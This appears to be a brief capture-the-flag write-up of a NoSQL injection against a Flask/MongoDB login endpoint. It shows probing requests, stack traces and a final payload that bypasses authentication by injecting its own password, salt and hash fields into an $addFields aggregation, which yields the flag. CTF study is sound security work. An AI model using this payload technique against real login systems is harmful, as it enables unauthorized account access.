POST /login HTTP/1.1

{"name":"a","password":"b"}
```
<title>403 Forbidden</title>
<h1>Forbidden</h1>
<p>You don&#x27;t have the permission to access the requested resource. It is either read-protected or not readable by the server.</p>
```

{"name":{"$ne": ""},"password":"b"}
```
Traceback (most recent call last):
  File "/home/appuser/mongo_in/flask/server.py", line 38, in login
    user = users.aggregate([{"$match": {"user": request.json["name"]}}, {"$addFields": request.json}]).next()
  File "/home/appuser/.local/lib/python3.8/site-packages/pymongo/collection.py", line 2453, in aggregate
    return self._aggregate(_CollectionAggregationCommand,
  File "/home/appuser/.local/lib/python3.8/site-packages/pymongo/collection.py", line 2375, in _aggregate
    return self.__database.client._retryable_read(
  File "/home/appuser/.local/lib/python3.8/site-packages/pymongo/mongo_client.py", line 1471, in _retryable_read
    return func(session, server, sock_info, slave_ok)
  File "/home/appuser/.local/lib/python3.8/site-packages/pymongo/aggregation.py", line 136, in get_cursor
    result = sock_info.command(
  File "/home/appuser/.local/lib/python3.8/site-packages/pymongo/pool.py", line 683, in command
    return command(self, dbname, spec, slave_ok,
  File "/home/appuser/.local/lib/python3.8/site-packages/pymongo/network.py", line 159, in command
    helpers._check_command_response(
  File "/home/appuser/.local/lib/python3.8/site-packages/pymongo/helpers.py", line 164, in _check_command_response
    raise OperationFailure(errmsg, code, response, max_wire_version)
pymongo.errors.OperationFailure: Invalid $addFields :: caused by :: Expression $ne takes exactly 2 arguments. 1 were passed in., full error: {'ok': 0.0, 'errmsg': 'Invalid $addFields :: caused by :: Expression $ne takes exactly 2 arguments. 1 were passed in.', 'code': 16020, 'codeName': 'Location16020'}
```

At the time the lucky user is "Behind You"

Change Password from string to int
{"name":"Behind You","password":1}
```
Traceback (most recent call last):
  File "/home/appuser/mongo_in/flask/server.py", line 39, in login
    if hashlib.sha256((user["password"] + user["salt"]).encode("UTF-8")).hexdigest() == user["hash"]:
TypeError: unsupported operand type(s) for +: 'int' and 'str'
```

python create_hash.py
```
fb8e20fc2e4c3f248c60c39bd652f3c1347298bb977b8b4d5903b85055620603
```

{
	"name":"Behind You",
	"password":"a",
	"salt":"b",
	"hash":"fb8e20fc2e4c3f248c60c39bd652f3c1347298bb977b8b4d5903b85055620603"
}
```
ptm{it_is_nice_to_have_objects_as_parameters}
```
